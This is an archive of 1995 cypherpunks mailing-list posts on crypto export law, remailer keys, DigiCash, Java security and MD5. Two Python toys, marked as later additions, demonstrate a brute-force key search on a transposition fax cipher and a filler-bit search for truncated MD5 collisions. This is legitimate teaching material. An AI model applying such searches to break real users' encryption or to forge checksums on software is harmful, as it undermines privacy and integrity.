
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

and it says this about COCOM:

> COCOM [1, 5]
> 
> 1. COCOM (Coordinating Committee for Multilateral Export Controls) is
> an international organization for the mutual control of the export of
> strategic products and technical data from country members to
> proscribed destinations. It maintains, among others, the International
> Industrial List and the International Munitions List. In 1991, COCOM
> has decided to allow export of mass-market cryptographic software
> (including public domain software). Some member countries of COCOM
> follow its regulations, but others, such as Germany and the United
> States, maintain separate regulations.
> 
> Its 17 members are Australia, Belgium, Canada, Denmark, France,
> Germany, Greece, Italy, Japan, Luxemburg, The Netherlands, Norway,
> Portugal, Spain, Turkey, United Kingdom and the United
> States. Cooperating members include Austria, Finland, Hungary,
> Ireland, New Zealand, Poland, Singapore, Slovakia, South Korea,
> Sweden, Switzerland, and Taiwan.

This phrase, if accurate, says it all:

> In 1991, COCOM has decided to allow export of mass-market
> cryptographic software (including public domain software).

> > > However our Government seems to take the view that putting crypto
> > > software on the net is not exporting it, the exporting is done
> > > whenever anyone from an export restricted country downloads the
> > > software and is done by them rather than by the person who made the
> > > software available.
> 
> > I also have heard this.
>
> I can not remember where I heard this though. I don't suppose you
> know whether this was an official policy statement or just a comment
> like 'well it may technically be illegal but we would hold the
> downloader liable rather than the supplier'?

I'm not sure if it's unofficial policy or law.  One place I remember
reading this was in one of the crypto groups, Paul Leyland expressed
this view in a recent post to one of the crypto groups.  This was to
do with potential "export" from ftp.ox.ac.uk, which he has something
to do with, and which contains copies of PGP (as well as nautilus,
pgpfone, various encrypting file systems, etc).

Here's my list of relevant sites, with info on EU crypto laws:

http://www.privacy.org/pi/
ftp://ftp.cl.cam.ac.uk/users/rja14/queensland.ps.Z
http://web.cnam.fr/Network/Crypto/survey.html
ftp://ftp.wimsey.com/pub/crypto/Doc/laws/laws-for.ps.gz
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm
ftp://ftp.uni-stuttgart.de/pub/doc/security/crypto/euro-clipper.ps.gz

I have been trying to maintain a list of them on:

	http://www.obscura.com/~shirt/

for political background for the munitions T-shirt, in the hope that
some people who browse it will read it and come away more aware than
they were before.  The main thing which worries me at the moment is
the implications of the eu-clipper: the secret service agencies of EU
countries have been plotting this for a while now, and probably have a
clipper like attempt on their agenda.  Ross Anderson reported that
there had been a secret meeting of secret service organisations
earlier this year, to discuss 

Ross Anderson <rja14@cl.cam.ac.uk> wrote (forwarded by somebody, but
originally in one or more of the crypto groups):
> [...]
> While at the conference, 

[the elided text indicated that the conference referred to was "the
Cryptography Policy and Algorithms Conference, Queensland University
of Technology"]

> I found out that a classified meeting took place this March in
> Germany between the signals intelligence agencies of the developed
> countries, plus Australia and South Africa, at which the assembled
> spooks agreed to press their governments to bring in escrow and/or
> weak crypto.

This comment was some time before the latest EU-clipper goings on were
announced.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Tue, 24 Oct 95 09:36:24 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Reformated: How secure....
Message-ID: <308D3F77@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



(Re Steve O's Privasoft followup)

Your reply didn't really answer all the questions that have been raised.

You mention a 2 digit key extension, so does that mean the key is 11 digits?
If not, how is a key extension different from a key?

Given that the program is exportable, why is it any stronger than any other
exportable system?

Re how you would recognize readable text: if the scramble is good, the
output would tend to look like white noise.  An invalid decrypt would have
the same general look.  But a valid one would have the properties of a normal
fax, which is long run lengths.  So if you do a run length check on the
data, you could readily distinguish a valid decrypt from an invalid one.

Incidentally, I looked at the sample encrypted document on the web.  It has
an amazing amount of structure in it, and certainly doesn't look at all like
the white noise I expected.  That in itself suggests a weakness.  (Notice the
dashed lines running down the page, 7 of them...)

Also, you forgot to address the known plaintext attack.  If I have both
plaintext and cyphertext, then recognition of the correct decryption is no
longer an issue (it's simply a compare).  For the system to be valid by modern
standards it has to be secure against a known plaintext attack, and preferably
against a chosen plaintext attack.  (In other words, if I get you to fax an
image of my choosing I should still not be able to recover the key.)  It
doesn't appear that it is secure in that sense.

Finally, the property you mention of being able to cope with damaged images
doesn't sound at all unique.  You would fail to have this property if you
use a block cypher with long blocks, a cypher with error propagation (e.g. CBC
mode in DES), or any cypher applied to the compressed form of the fax.
But any stream cypher or transposition cypher (as I gather you use) applied
against the raw bitmap has this property, since any flaws in the encrypted
image would simply become noise in the plaintext image.  (A black line
would become a gray line in a stream cypher; in a transposition cypher it
becomes pixel dust on the page.)

     paul
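
[Added example, not part of the message above and not PrivaSoft's code: a toy
PRNG-seeded pixel transposition (an assumption, since the real engine is
proprietary) applied to a constructed 64x48 page, showing the run-length test
picking out the correct key, the known-plaintext compare, and a damaged scan
line turning into scattered pixel dust. All function names, the 8-bit key
space and the key 201 are constructed for illustration.]

```python
import random

WIDTH, HEIGHT = 64, 48      # constructed page, far smaller than a real fax
KEY_BITS = 8                # toy key space; the thread estimates about 30 bits

def make_page():
    """Constructed fax-like bitmap: white page (0) with rows of black 'words' (1)."""
    page = [[0] * WIDTH for _ in range(HEIGHT)]
    for top in range(4, HEIGHT - 4, 6):            # one text line every 6 rows
        for row in (top, top + 1):
            for col in range(6, WIDTH - 6):
                if (col - 6) % 9 < 7:              # 7-pixel words, 2-pixel gaps
                    page[row][col] = 1
    return [pixel for row in page for pixel in row]

def permutation(key, n):
    """Toy keyed transposition: the key seeds a PRNG that shuffles positions."""
    order = list(range(n))
    random.Random(key).shuffle(order)
    return order

def scramble(pixels, key):
    return [pixels[src] for src in permutation(key, len(pixels))]

def unscramble(pixels, key):
    out = [0] * len(pixels)
    for dst, src in enumerate(permutation(key, len(pixels))):
        out[src] = pixels[dst]
    return out

def rows(pixels):
    return [pixels[r * WIDTH:(r + 1) * WIDTH] for r in range(HEIGHT)]

def mean_run_length(pixels):
    """Average length of runs of identical pixels, counted along each scan line."""
    runs = sum(1 + sum(a != b for a, b in zip(row, row[1:])) for row in rows(pixels))
    return len(pixels) / runs

def search(ciphertext, key_bits=KEY_BITS):
    """Ciphertext-only search: keep the key whose decrypt has the longest runs."""
    scored = ((mean_run_length(unscramble(ciphertext, k)), k)
              for k in range(2 ** key_bits))
    score, key = max(scored)
    return key, score

def known_plaintext_search(plaintext, ciphertext, key_bits=KEY_BITS):
    """With a known page, recognising the right key is a plain comparison."""
    for k in range(2 ** key_bits):
        if scramble(plaintext, k) == ciphertext:
            return k
    return None

def damage_scan_line(pixels, row):
    """Transmission flaw: one whole scan line of the received image turns black."""
    out = list(pixels)
    out[row * WIDTH:(row + 1) * WIDTH] = [1] * WIDTH
    return out

def errors_per_row(original, recovered):
    """Number of wrong pixels on each scan line of the recovered page."""
    return [sum(a != b for a, b in zip(x, y))
            for x, y in zip(rows(original), rows(recovered))]

if __name__ == "__main__":
    page, key = make_page(), 201                   # constructed key
    ct = scramble(page, key)
    print("run length: page %.1f, scrambled %.1f"
          % (mean_run_length(page), mean_run_length(ct)))
    print("ciphertext-only search:", search(ct))
    print("known-plaintext search:", known_plaintext_search(page, ct))
    errs = errors_per_row(page, unscramble(damage_scan_line(ct, 20), key))
    print("damaged pixels: %d total, at most %d on any one row"
          % (sum(errs), max(errs)))
```

[The gap between the run length of the true page and that of every wrong-key
decrypt is what makes an exhaustive search self-checking; a longer key raises
the cost of the search but does not remove the recogniser.]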




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 24 Oct 95 10:49:37 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com>
Subject: Weekly Type-II Remailer List
Message-ID: <Pine.BSD.3.91.951024122535.701A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ED: You might notice that gondolin has retired. (Sigh!)

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

- -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

- -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

- -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

- -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

- -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 12:45:44 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510241944.MAA00667@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Name Withheld by Request) writes:

>Now all we need to do is get some specs on how DigiCash's software works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
>bunch of forms, etc.  I suspect that most people would rather change money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

I don't believe this $250 is correct.  The only place I see such a number
is on the application form, in the following clause:

"A maintenance fee of the foreign equivalent of $10 will be imposed each
statement period if the balance in your account falls below the foreign
equivalent of $250 on any day of the period."

This is for a "WorldCurrency Access Interest Account", which I don't
think is what is used for ecash.  For ecash the account opening fee is
$11 and the per-month fee is $5.  I don't see any reference to required
account minimums.

As far as the issue of coding up a payee-blinding cash system compatible
with this ecash, I agree that it would be good to see some specs now that
ecash is for real.  IMO Chaum has been getting a free ride based on his
reputation, with many people assuming that anything he is associated
with must be done right.  It is time for him to open his hand and reveal
his protocols so that people know exactly what they are trusting their
money to.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 24 Oct 95 09:59:34 PDT
To: tcmay@got.net
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <199510100354.UAA10505@comsec.com>
Message-ID: <9510241652.AA10785@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 9 Oct 1995 11:20:41 -0700

I'm late getting to my mail backlog.

>From: tcmay@got.net (Timothy C. May)


>It's clear that cops cannot protect people, only try to catch the perpetrators.

I heard a particularly scary quote from Director Freeh last Sunday on NPR's
Weekend Edition (I believe that was the show -- segment A-1) in which he
declared "our job is to protect the people".

If that were the FBI's job, then we'd have to look at it as one does to a
loving parent and give it all the authority and respect a child gives a
parent.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Tue, 24 Oct 95 12:54:37 PDT
To: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <v02110104acb2f2b8513a@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02110101acaf51651ef9@[204.156.156.4]>,
>Todd Glassey <todd@lgt.com> wrote:
>[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
>> Pardon the flame but I really have just about heard enough of this BS...
>[...]
>> >> The area where we can (must) build trust is the computing base.
>> >> Traditionally, this has been the OS, but in the case of java, it is
>> >> the java interpreter (such as netscape 2.0 and hotjava).  The browser
>> >>  is now the TCB (trusted computer base) for all practical purposes...
>> >
>> >Read: The Java interpreter is supposed to be a TCB.
>[...]
>> >Who here truly believes that the implementations of Java meet the
>> >requirements of a TCB?
>[...]
>> Dr. Fred, you seem to spend a lot of energy slamming Java and HotJava.
>[ ... flame deleted ... ]
>
>
>No, here I think Dr. Cohen's comments are right on the mark.
>
>The Java interpreter *is* supposed to be a trusted computing base.
>Do we have any reason to believe that this trust is well-placed?
>
>(If you don't agree, go through the Orange Book evaluation criteria,
>and pay special attention to the assurance sections...)
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
>NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
>=UZH0
>-----END PGP SIGNATURE-----


Sorry about the above flame-war I caused.

My point was almost benign in and of itself. Yes, the Java concept is
sound, No, the currently available implementation has some real
architectural considerations that must be addressed in order that we can
build a stable and secure platform atop it.

My real issue is that there is so much time spent on this list knocking the
individual spokes that make up this wheel we call Electronic Commerce, that
it is more and more costly to filter out the technology from the background
noise. Still because of the value of that technology, I and others are
forced to spend precious hours reviewing all that comes across our desks.

Bluntly, being an active member of several Security and Payment Mechanism
working groups I view some 150+ pieces of email a day and sometimes get
frustrated by the amount of noise, or the roar in the background, about
what are to the largest percentage of us, meaningless dribble... Still
there is the occasional golden nugget that makes it all worth while..

Again, my apologies to have stirred up this mess. I will retreat under my
desktop from the melee that seems to be unending.

Todd




Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 24 Oct 95 10:59:53 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <199510241203.IAA22014@homeport.org>
Message-ID: <199510241759.NAA01689@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	Who cares if you can read messages encrypted to the key or
>not?  Let everyone connect and download whatever messages they want to
>see.  They're encrypted, after all.

Two reasons.  One, it cuts down on traffic.  Why bother to waste the
server's bandwidth on something the client can't read anyway.  The only
possible reason someone could be asking for the data is because they're
trying to compromise the key or do traffic analysis.  Why help bad
guys?

Second, there's no reason the messages need to be encrypted.  The
server can accept messages addressed to *any* string of eight hex
digits, and doesn't care about the content.  The server needn't limit
the kinds of encryption used in the actual message.  It only cares that
the recipient is "really" (in some sense) the right receiver.

The original mental prompt for the idea came from the discussion of
the "key-is-the-person" model.  I was trying to devise a scenario where
it was possible to know of an entity only through his key, and came up
with this.  I also included the idea that messages signed by the key
would be forwarded by the server after being pseudonymized to the
keyid.  That way, the user could participate in mailing lists purely
identified by the key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 13:12:24 PDT
To: fc@all.net
Subject: MD5 concerns, was Re: Netscape Logic Bomb detailed by IETF
Message-ID: <9510242008.AA07416@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,

This is the second time you've implied that an MD5 checksum might not be
as secure as we think.  Could you share your thinking on this?  I had
believed from reading the algorithm that it's not possible to predict how
a change in the input will affect the checksum.  Given a modified version
of netscape for example, how would you change some non-critical portion of
the code to get the same checksum that the original should have.  I suppose
that given n bits of non-critical space in the code, (non-critical meaning
that changing them will have no effect on the execution of the code, and
assuming that you don't want to change the length of the code), that you
could try all possible combinations of those bits, or 2^n trials and
see if you get the correct MD5 checksum.  If you do, then on average you'd
actually only have to try 2^(n-1) trials. What if you don't?  What would
you do then?  MD5 produces a 128 bit output, and it would seem likely that
this would be hard.  As far as I know there are no known attacks for any
MDx algorithms in spite of Ron's worries about MD4.  It's a subject of
on-going research though, and it is only "conjectured that it is
computationally infeasible to produce two messages having the same
message digest, or to produce any messages having a given prespecified
target message digest." (RFC 1321)  So, if you have newer information,
or pointers to any papers, (other than the den Boer and Bosselaers papers),
could you let me know?

Thanks,

Patrick

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
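The search described in the message above, as an added example that is not part of the original post: it tries every setting of n free "non-critical" bits in a modified file and counts how many reproduce the original's MD5 digest truncated to t bits, so the cost can be measured at toy sizes. The truncation, the function names and the two sample byte strings are constructed for illustration; against the full 128-bit digest the same loop would need on the order of 2^128 trials.

```python
import hashlib
import math

DIGEST_BITS = 128  # size of an MD5 digest

# Constructed sample inputs (equal length, as the post requires).
ORIGINAL = b"constructed-sample-binary: check_license()=1;"
MODIFIED = b"constructed-sample-binary: check_license()=0;"


def truncated_md5(data, t_bits):
    """Top t_bits of MD5(data) as an integer: a toy stand-in for the full digest."""
    full = int.from_bytes(hashlib.md5(data).digest(), "big")
    return full >> (DIGEST_BITS - t_bits)


def with_filler(code, filler, n_bits):
    """Append n_bits of free space (rounded up to whole bytes) holding `filler`."""
    return code + filler.to_bytes((n_bits + 7) // 8, "big")


def search(original, modified, n_bits, t_bits):
    """Try all 2^n fillers; return (target, fillers whose truncated digest matches)."""
    target = truncated_md5(with_filler(original, 0, n_bits), t_bits)
    matches = [
        filler
        for filler in range(2 ** n_bits)
        if truncated_md5(with_filler(modified, filler, n_bits), t_bits) == target
    ]
    return target, matches


def success_probability(n_bits, t_bits):
    """Chance that at least one of 2^n candidates hits a fixed t-bit digest,
    modelling the hash as a random function: 1 - (1 - 2^-t)^(2^n)."""
    return -math.expm1((2.0 ** n_bits) * math.log1p(-(2.0 ** -t_bits)))


if __name__ == "__main__":
    for n_bits, t_bits in [(16, 8), (16, 16), (8, 32)]:
        _, matches = search(ORIGINAL, MODIFIED, n_bits, t_bits)
        first = matches[0] + 1 if matches else None
        print(f"n={n_bits:2d} t={t_bits:2d}: {len(matches):4d} matching fillers, "
              f"first after {first} trials, "
              f"P(any match)={success_probability(n_bits, t_bits):.3g}")
    # The case the post asks about: 64 free bits against the real digest size.
    print(f"n=64 t=128: P(any match)={success_probability(64, 128):.3g}")
```

When n is smaller than t the usual outcome is that no filler matches at all, which is the "what if you don't?" case in the post.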




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 24 Oct 95 10:10:53 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510241549.AA19649@all.net>
Message-ID: <199510241710.NAA18747@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen writes:

> The differences between my secure http server and Netscape's browser
> are quite dramatic, [snip]

No doubt about that.  One's a real product, one's (primarily) a piece
of puffery.


> My get-only server cannot run outside applications, and hence does not
> have the vulnerability of Netscape's browser.  Note also the distinction
> between a server and a browser.

Note in particular the distinction between Fred's server and a real HTTP
server:
It does not run CGI scripts (i.e. no forms support).  It does not have
per-user access control.  It does not have URL mapping.  It cannot
redirect.  All configuration is hard-coded into the binary.  It doesn't
support user directories (e.g. http://site/~yourname).  It doesn't do
server-side includes.  It can't process the HEAD method.  It cannot create
a directory index (if no index.html is present).  It does not support
conditional retrieval (i.e. "If-modified-since").  It is slow (requires
a separate process for each request).  It is initiated by inetd for each
HTTP connection and hence relies on that program's security as well (the
"line-by-line analysis" of inetd is conspicuously missing from Fred's
self-congratulatory whitepaper -- not to mention the OS on which it is
intended to run).  It does not even have the capability to identify the
content type of the retrieved file (apparently you must embed
"Content-type: text/html\n\n" [or whatever] at the beginning of each HTML
source file).

I'm not saying it's completely useless, only that it does not constitute
an HTTP server in the usual sense of the word.  Hence, Fred's continued
boasting of this prodigious feat of programming prowess is complete
bullshit.  And, incidentally, the programming style, with its reliance
on global fixed-length buffers, shared variables, lack of prototypes,
forgotten function arguments, absence of error checking on system call
returns, etc. is more suggestive of a first year CS student than an
alleged PhD, *and* demonstrates a style more typical of a BASIC
programmer than a C programmer.  Don't try this at home, kids; this is
NOT the way to write "secure" software unless your whole program fits
in 80 lines too.


> My get-only server is available in source form, is 80 lines long and
> thus easily understood, has been shown to meet security properties,

[blah blah]

